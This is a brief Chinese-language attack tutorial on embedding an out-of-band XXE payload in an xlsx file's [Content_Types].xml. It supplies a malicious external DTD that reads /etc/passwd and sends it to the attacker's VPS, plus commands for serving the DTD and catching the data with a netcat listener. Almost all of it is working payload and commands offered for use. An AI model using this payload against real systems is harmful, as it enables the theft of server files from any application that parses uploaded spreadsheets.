创建xlsx
文件,后缀改为 .zip 然后解压缩。
⚠️ xls是一个特有的二进制格式,xls没办法插入Payload进行XXE攻击.
在[Content_Types].xml文件中插入Payload
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://<yourvpsip:http-port>/malicious.dtd"> %xxe;]>
将插入Payload后的文件重新压缩,再将压缩包的后缀名修改为 xlsx
在恶意malicious.dtd文件所在目录启动http服务:
python3 -m http.server 端口号
python2 -m SimpleHTTPServer 端口号
恶意文件 malicious.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://<yourvpsip:nc-port>/?x=%file;'>">
%eval;
%exfiltrate;
nc -lvvp 8081